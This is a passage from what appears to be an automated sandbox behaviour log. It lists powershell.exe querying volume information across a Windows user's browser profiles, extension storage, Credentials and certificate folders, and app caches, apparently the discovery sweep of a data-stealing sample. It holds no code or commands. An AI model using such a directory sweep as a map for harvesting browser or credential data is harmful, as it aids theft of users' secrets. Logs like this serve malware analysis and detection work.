            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Linguistics VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\History VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Credentials VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\InputPersonalization VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\BackstageInAppNavCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED} VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\AppCache\SUDOA50H VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\8HYVANJG VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QP9K14N5 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApiGroup VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000045 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000105 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000161 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000163 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000165 VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\INetCache VolumeInformation
